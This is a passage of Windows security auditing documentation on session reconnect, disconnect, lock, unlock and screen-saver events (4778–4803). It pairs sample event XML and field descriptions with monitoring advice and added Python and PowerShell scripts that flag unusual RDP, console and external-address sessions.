This event is generated when a user reconnects to an existing Terminal Services session, or when a user switches to an existing desktop using Fast User Switching.
This event is also generated when a user reconnects to a virtual host Hyper-V Enhanced Session, for example.

Note For recommendations, see Security Monitoring Recommendations for this event.
Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4778</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12551</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-10T23:05:29.743867200Z" />
<EventRecordID>237651</EventRecordID>
<Correlation />
<Execution ProcessID="504" ThreadID="2212" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="AccountName">ladmin</Data>
<Data Name="AccountDomain">CONTOSO</Data>
<Data Name="LogonID">0x1e01f6</Data>
<Data Name="SessionName">RDP-Tcp\#6</Data>
<Data Name="ClientName">WIN81</Data>
<Data Name="ClientAddress">10.0.0.100</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Account Name [Type = UnicodeString]: the name of the account for which the session was reconnected.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Session:
Session Name [Type = UnicodeString]: the name of the session to which the user was reconnected. Examples:
RDP-Tcp#N, where N is the session number – typical RDP session name.
Console – console session, typical for Fast User Switching.
31C5CE94259D4006A9E4#3 – example of a “Hyper-V Enhanced Session” session name.
You can see the list of current sessions using the “query session” command in a command prompt. Example of output (see SESSIONNAME column):

Additional Information:
Client Name [Type = UnicodeString]: computer name from which the user was reconnected. Has
“Unknown” value for console session.
Client Address [Type = UnicodeString]: IP address of the computer from which the user was reconnected.
IPv6 address or ::ffff:IPv4 address of a client.
::1 or 127.0.0.1 means localhost.
Has “LOCAL” value for console session.

Security Monitoring Recommendations

For 4778(S): A session was reconnected to a Window Station.

TYPE OF MONITORING REQUIRED / RECOMMENDATION

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on.
Recommendation: Monitor this event with the “Subject\Account Name” that corresponds to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours.
Recommendation: When you monitor for anomalies or malicious actions, use the “Subject\Account Name” (with other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used.
Recommendation: Monitor this event with the “Subject\Account Name” that corresponds to the accounts that should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events.
Recommendation: If this event corresponds to a “whitelist-only” action, review the “Subject\Account Name” for accounts that are outside the whitelist.

Accounts of different types: You might want to ensure that certain actions are performed only by certain account types, for example, local or domain account, machine or user account, vendor or employee account, and so on.
Recommendation: If this event corresponds to an action you want to monitor for certain account types, review the “Subject\Account Name” to see whether the account type is as expected.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are not allowed to perform certain actions (represented by certain specific events).
Recommendation: Monitor this event for the “Subject\Account Domain” corresponding to accounts from another domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain people (accounts) should not typically perform any actions.
Recommendation: Monitor the target Computer: (or other target device) for actions performed by the “Subject\Account Name” that you are concerned about.

Account naming conventions: Your organization might have specific naming conventions for account names.
Recommendation: Monitor “Subject\Account Name” for names that don’t comply with naming conventions.

If Fast User Switching is disabled on workstations or specific computers, then monitor for any event with Session Name = Console.
If Remote Desktop Connections are not allowed for specific users (Subject\Account Name) or disabled on some computers, then monitor for Session Name = RDP-Tcp# (substring).
If a specific computer or device (Client Name or Client Address) should never connect to this computer (Computer), monitor for any event with that Client Name or Client Address.
Check that Additional Information\Client Address is in your internal IP address list.
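The Python below is an added example, not Microsoft's code, implementing the four 4778 checks just listed: it classifies Session Name into RDP, Console or Hyper-V Enhanced Session using the name formats from the field description, then flags Console reconnects on hosts where Fast User Switching is disabled, RDP reconnects by accounts that may not use Remote Desktop, reconnects from blocked Client Name values, and Client Address values outside the internal list. EventData names match the 4778 XML shown above; the host, user and network policy and the sample events are constructed.

```python
"""Apply the 4778 (session reconnected) monitoring recommendations above.
Added example, not Microsoft's code: EventData names match the 4778 XML above;
the policy and sample events are constructed.
"""
import ipaddress
import re

RDP_SESSION = re.compile(r"^RDP-Tcp\\?#\d+$", re.IGNORECASE)   # exported XML shows RDP-Tcp\#6
HYPERV_SESSION = re.compile(r"^[0-9A-F]{20}#\d+$")              # e.g. 31C5CE94259D4006A9E4#3

FUS_DISABLED_HOSTS = {"ws-finance01"}           # constructed: Fast User Switching disabled here
RDP_DISALLOWED_USERS = {"contoso\\svc_backup"}   # constructed: must never use Remote Desktop
BLOCKED_CLIENTS = {"kiosk07"}                    # constructed: Client Name values that must never reconnect
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # constructed internal list
LOCAL_ADDRESSES = ("LOCAL", "::1", "127.0.0.1")  # console session / localhost, per the field description


def session_kind(name):
    """Classify Session Name as 'rdp', 'console', 'hyperv' or 'other'."""
    if RDP_SESSION.match(name):
        return "rdp"
    if name.lower() == "console":
        return "console"
    if HYPERV_SESSION.match(name):
        return "hyperv"
    return "other"


def check_4778(ev, computer):
    """Findings for one event; `computer` is the System\\Computer the event was logged on."""
    user = f"{ev['AccountDomain']}\\{ev['AccountName']}".lower()
    kind = session_kind(ev["SessionName"])
    out = []
    if kind == "console" and computer.lower() in FUS_DISABLED_HOSTS:
        out.append(f"Console reconnect on {computer}, where Fast User Switching is disabled")
    if kind == "rdp" and user in RDP_DISALLOWED_USERS:
        out.append(f"Remote Desktop reconnect by {user}, which is not allowed RDP")
    if ev["ClientName"].lower() in BLOCKED_CLIENTS:
        out.append(f"reconnect from blocked client {ev['ClientName']}")
    addr = ev["ClientAddress"]
    if addr not in LOCAL_ADDRESSES:
        ip = ipaddress.ip_address(addr)
        if not any(ip in net for net in INTERNAL_NETS):
            out.append(f"client address {addr} is not in the internal address list")
    return out


# Constructed samples as (System\Computer, EventData): the event on this page, a service
# account reconnecting over RDP from a blocked external client, and a console reconnect.
SAMPLE_EVENTS = [
    ("DC01.contoso.local", {"AccountName": "ladmin", "AccountDomain": "CONTOSO", "LogonID": "0x1e01f6",
                            "SessionName": "RDP-Tcp\\#6", "ClientName": "WIN81", "ClientAddress": "10.0.0.100"}),
    ("fs01.contoso.local", {"AccountName": "svc_backup", "AccountDomain": "CONTOSO", "LogonID": "0x2a4f1",
                            "SessionName": "RDP-Tcp\\#2", "ClientName": "kiosk07", "ClientAddress": "198.51.100.9"}),
    ("ws-finance01", {"AccountName": "jdoe", "AccountDomain": "CONTOSO", "LogonID": "0x3b1c0",
                      "SessionName": "Console", "ClientName": "Unknown", "ClientAddress": "LOCAL"}),
]


def run_sample():
    """Findings per constructed event, in order."""
    return [check_4778(ev, computer) for computer, ev in SAMPLE_EVENTS]
```

The same classifier applies unchanged to 4779 (session disconnected), which carries the identical Session Name, Client Name and Client Address fields.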
4779(S): A session was disconnected from a Window
Station.
4/5/2019 • 4 minutes to read • Edit Online

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Logon/Logoff Events
Event Description:
This event is generated when a user disconnects from an existing Terminal Services session, or when a user switches away from an existing desktop using Fast User Switching.
This event is also generated when a user disconnects from a virtual host, for example a Hyper-V Enhanced Session.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4779</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12551</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-10T23:04:41.044489800Z" />
    <EventRecordID>237646</EventRecordID>
    <Correlation />
    <Execution ProcessID="504" ThreadID="524" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="AccountName">ladmin</Data>
    <Data Name="AccountDomain">CONTOSO</Data>
    <Data Name="LogonID">0x1e01f6</Data>
    <Data Name="SessionName">RDP-Tcp#3</Data>
    <Data Name="ClientName">WIN81</Data>
    <Data Name="ClientAddress">10.0.0.100</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Account Name [Type = UnicodeString]: the name of the account for which the session was disconnected.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Session:
Session Name [Type = UnicodeString]: the name of the disconnected session. Examples:
RDP-Tcp#N, where N is the session number – typical RDP session name.
Console – console session, typical for Fast User Switching.
31C5CE94259D4006A9E4#3 – example of a “Hyper-V Enhanced Session” session name.
You can see the list of current sessions using the “query session” command in a command prompt.
Example of output (see SESSIONNAME column):

Additional Information:
Client Name [Type = UnicodeString]: machine name from which the session was disconnected. Has the value “Unknown” for a console session.
Client Address [Type = UnicodeString]: IP address of the computer from which the session was disconnected.
IPv6 address or ::ffff:IPv4 address of a client.
::1 or 127.0.0.1 means localhost.
Has the value “LOCAL” for a console session.

Security Monitoring Recommendations

For 4779(S): A session was disconnected from a Window Station.

TYPE OF MONITORING REQUIRED / RECOMMENDATION

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, the built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on.
  Recommendation: Monitor this event with the “Subject\Account Name” that corresponds to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours.
  Recommendation: When you monitor for anomalies or malicious actions, use the “Subject\Account Name” (with other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used.
  Recommendation: Monitor this event with the “Subject\Account Name” that corresponds to the accounts that should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events.
  Recommendation: If this event corresponds to a “whitelist-only” action, review the “Subject\Account Name” for accounts that are outside the whitelist.

Accounts of different types: You might want to ensure that certain actions are performed only by certain account types, for example, local or domain account, machine or user account, vendor or employee account, and so on.
  Recommendation: If this event corresponds to an action you want to monitor for certain account types, review the “Subject\Account Name” to see whether the account type is as expected.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are not allowed to perform certain actions (represented by certain specific events).
  Recommendation: Monitor this event for the “Subject\Account Domain” corresponding to accounts from another domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain people (accounts) should not typically perform any actions. For example, you might have computers to which connections should not be made from certain accounts or addresses.
  Recommendation: Monitor the target Computer: (or other target device) for actions performed by the “Subject\Account Name” that you are concerned about. If you have a target Computer: (or other target device) to which connections should not be made from certain accounts or addresses, monitor this event for the corresponding Client Name or Client Address.

Account naming conventions: Your organization might have specific naming conventions for account names.
  Recommendation: Monitor “Subject\Account Name” for names that don’t comply with naming conventions.

If Fast User Switching is disabled on workstations or specific computers, then monitor for any event with Session Name = Console.
If Remote Desktop Connections are not allowed for specific users (Subject\Account Name) or are disabled on some computers, then monitor for Session Name = RDP-Tcp# (substring).
To ensure that connections are made only from your internal IP address list, monitor the Additional Information\Client Address in this event.
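The three checks listed above translate directly into logic over the event fields. The following PowerShell is an added example written for this page, not code from the original document or from Microsoft: it flattens the event XML into a hashtable, then flags Console sessions on hosts where Fast User Switching is disabled, reports RDP-Tcp# sessions with their source, and flags Client Address values outside an internal range list. The internal ranges, the list of hosts without Fast User Switching, the helper names and the two extra sample records are assumptions made for the demonstration; the first sample record is the 4779 XML shown above. The same functions apply to 4778 (A session was reconnected to a Window Station), which carries the same fields.

```powershell
# Added example (not from the original page): apply the 4778/4779 checks above to Security
# event XML. Everything under "constructed input" is made up for the demonstration; the
# functions themselves run unchanged against records returned by Get-WinEvent.

# Assumption: RFC 1918 ranges stand in for the organization's internal address list.
$InternalCidrs = @('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')
# Assumption: hosts on which Fast User Switching has been disabled by policy.
$NoFastUserSwitching = @('DC01.contoso.local')

function ConvertTo-IPv4Long([System.Net.IPAddress]$a) {
    $b = $a.GetAddressBytes()   # network byte order
    return ([long]$b[0] -shl 24) -bor ([long]$b[1] -shl 16) -bor ([long]$b[2] -shl 8) -bor [long]$b[3]
}

function Test-InCidr {
    # True when an IPv4 address (plain or in the ::ffff: mapped form) lies inside a CIDR block.
    param([string]$Address, [string]$Cidr)
    $Address = $Address -replace '^::ffff:', ''
    $ip = $null
    if (-not [System.Net.IPAddress]::TryParse($Address, [ref]$ip) -or
        $ip.AddressFamily -ne [System.Net.Sockets.AddressFamily]::InterNetwork) { return $false }
    $net, $bits = $Cidr.Split('/')
    $mask = ([long]0xFFFFFFFF -shl (32 - [int]$bits)) -band 0xFFFFFFFF
    return ((ConvertTo-IPv4Long $ip) -band $mask) -eq ((ConvertTo-IPv4Long ([System.Net.IPAddress]::Parse($net))) -band $mask)
}

function ConvertFrom-SecurityEventXml {
    # Flattens <System> essentials and every <EventData><Data Name=...> into one hashtable,
    # so a field reads as $e.ClientAddress regardless of which event ID produced it.
    param([string]$Xml)
    $ev = ([xml]$Xml).Event
    $id = $ev.System.EventID
    if ($id -is [System.Xml.XmlElement]) { $id = $id.'#text' }   # EventID may carry a Qualifiers attribute
    $h = @{ EventId = [int]$id; Computer = $ev.System.Computer; Time = $ev.System.TimeCreated.SystemTime }
    foreach ($d in $ev.EventData.Data) { $h[$d.Name] = $d.'#text' }
    return $h
}

function Get-SessionEventFindings {
    # Applies the three recommendations above to one 4778 (reconnect) or 4779 (disconnect) record.
    param([hashtable]$E)
    $findings = @()
    if ($E.EventId -notin 4778, 4779) { return $findings }
    $action = if ($E.EventId -eq 4778) { 'reconnected' } else { 'disconnected' }
    $who    = "$($E.AccountDomain)\$($E.AccountName)"
    $src    = "$($E.ClientName) ($($E.ClientAddress))"
    # 1. Session Name = Console on a host where Fast User Switching is disabled.
    if ($E.SessionName -eq 'Console' -and $E.Computer -in $NoFastUserSwitching) {
        $findings += "console session $action by $who on $($E.Computer), where Fast User Switching is disabled"
    }
    # 2. Session Name contains RDP-Tcp#: every RDP session is reported with its source so the
    #    per-user / per-computer RDP allow list can be applied to it.
    if ($E.SessionName -like 'RDP-Tcp#*') {
        $findings += "RDP session $($E.SessionName) $action by $who from $src"
    }
    # 3. Client Address outside the internal list; console sessions carry LOCAL rather than an address.
    if ($E.ClientAddress -and $E.ClientAddress -notin 'LOCAL', '::1', '127.0.0.1') {
        $internal = $false
        foreach ($c in $InternalCidrs) { if (Test-InCidr $E.ClientAddress $c) { $internal = $true; break } }
        if (-not $internal) { $findings += "Client Address $($E.ClientAddress) is outside the internal list ($who, $($E.SessionName))" }
    }
    return $findings
}

# --- constructed input: the 4779 record shown above plus two made-up records -------------
function New-SessionEventXml {
    param([int]$Id, [string]$Time, [string]$Computer, [string]$Account, [string]$Session, [string]$Client, [string]$Address)
    @"
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>$Id</EventID><Version>0</Version><Level>0</Level><Task>12551</Task><Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime="$Time" /><Channel>Security</Channel>
    <Computer>$Computer</Computer><Security /></System>
  <EventData><Data Name="AccountName">$Account</Data><Data Name="AccountDomain">CONTOSO</Data>
    <Data Name="LogonID">0x1e01f6</Data><Data Name="SessionName">$Session</Data>
    <Data Name="ClientName">$Client</Data><Data Name="ClientAddress">$Address</Data></EventData>
</Event>
"@
}
$SampleEvents = @(
    (New-SessionEventXml 4779 '2015-09-10T23:04:41.044489800Z' 'DC01.contoso.local' 'ladmin' 'RDP-Tcp#3' 'WIN81' '10.0.0.100'),
    (New-SessionEventXml 4778 '2015-09-10T23:30:00.000000000Z' 'DC01.contoso.local' 'ladmin' 'RDP-Tcp#5' 'UNKNOWN-PC' '::ffff:203.0.113.7'),
    (New-SessionEventXml 4778 '2015-09-10T23:45:00.000000000Z' 'DC01.contoso.local' 'dadmin' 'Console' 'Unknown' 'LOCAL')
)
foreach ($xml in $SampleEvents) {
    $e = ConvertFrom-SecurityEventXml $xml
    Get-SessionEventFindings $e | ForEach-Object { "$($e.Time) $($e.EventId) $_" }
}

# Live use (needs Event Log Readers or admin), same functions fed from the Security log:
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4778, 4779 } -MaxEvents 1000 |
#     ForEach-Object { $e = ConvertFrom-SecurityEventXml $_.ToXml(); Get-SessionEventFindings $e }
```

The first sample record produces only the RDP line (10.0.0.100 is inside the assumed internal ranges), the second produces the RDP line plus an external-address finding, and the third a Console finding. The IPv4-mapped form is handled explicitly because Client Address can arrive as ::ffff:a.b.c.d, which a naive string comparison against an IPv4 list would miss.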
4800(S): The workstation was locked.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Logon/Logoff Events
Event Description:
This event is generated when a workstation was locked.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4800</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12551</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-10T23:47:02.430644500Z" />
    <EventRecordID>237655</EventRecordID>
    <Correlation />
    <Execution ProcessID="504" ThreadID="2568" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="TargetUserName">dadmin</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetLogonId">0x759a9</Data>
    <Data Name="SessionId">3</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “lock workstation” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “lock workstation”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Session ID [Type = UInt32]: unique ID of the locked session. You can see the list of current session IDs using the “query session” command in a command prompt. Example of output (see ID column):

Security Monitoring Recommendations

For 4800(S): The workstation was locked.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Typically this is an informational event, and can give you information about when a machine was locked, and
which account was used to lock it.
4801(S): The workstation was unlocked.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Logon/Logoff Events
Event Description:
This event is generated when a workstation was unlocked.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4801</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12551</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-10T23:47:05.886096400Z" />
    <EventRecordID>237657</EventRecordID>
    <Correlation />
    <Execution ProcessID="504" ThreadID="4540" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="TargetUserName">dadmin</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetLogonId">0x759a9</Data>
    <Data Name="SessionId">3</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “unlock workstation” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “unlock workstation”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Session ID [Type = UInt32]: unique ID of the unlocked session. You can see the list of current session IDs using the “query session” command in a command prompt. Example of output (see ID column):

Security Monitoring Recommendations

For 4801(S): The workstation was unlocked.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Typically this is an informational event, and can give you information about when a machine was unlocked, and
which account was used to unlock it.
4802(S): The screen saver was invoked.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Logon/Logoff Events
Event Description:
This event is generated when the screen saver was invoked.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4802</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12551</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-11T00:16:32.377883700Z" />
    <EventRecordID>237662</EventRecordID>
    <Correlation />
    <Execution ProcessID="504" ThreadID="1676" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="TargetUserName">dadmin</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetLogonId">0x759a9</Data>
    <Data Name="SessionId">3</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “invoke screensaver” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “invoke screensaver”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Session ID [Type = UInt32]: unique ID of the session for which the screen saver was invoked. You can see the list of current session IDs using the “query session” command in a command prompt. Example of output (see ID column):

Security Monitoring Recommendations

For 4802(S): The screen saver was invoked.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Typically this is an informational event, and can give you information about when a screen saver was invoked on
a machine, and which account invoked it.
4803(S): The screen saver was dismissed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Logon/Logoff Events
Event Description:
This event is generated when the screen saver was dismissed.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4803</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12551</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-11T00:19:09.576094500Z" />
    <EventRecordID>237663</EventRecordID>
    <Correlation />
    <Execution ProcessID="504" ThreadID="524" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="TargetUserName">dadmin</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetLogonId">0x759a9</Data>
    <Data Name="SessionId">3</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “dismiss screensaver” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “dismiss screensaver”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Session ID [Type = UInt32]: unique ID of the session for which the screen saver was dismissed. You can see the list of current session IDs using the “query session” command in a command prompt. Example of output (see ID column):

Security Monitoring Recommendations

For 4803(S): The screen saver was dismissed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Typically this is an informational event, and can give you information about when a screen saver was dismissed
on a machine, and which account dismissed it.
5378(F): The requested credentials delegation was disallowed by policy.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Logon/Logoff Events
Event Description:
This event generates when a requested CredSSP credentials delegation was disallowed by the CredSSP delegation policy.
It typically occurs when CredSSP delegation for a WinRM double-hop session was not configured properly.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
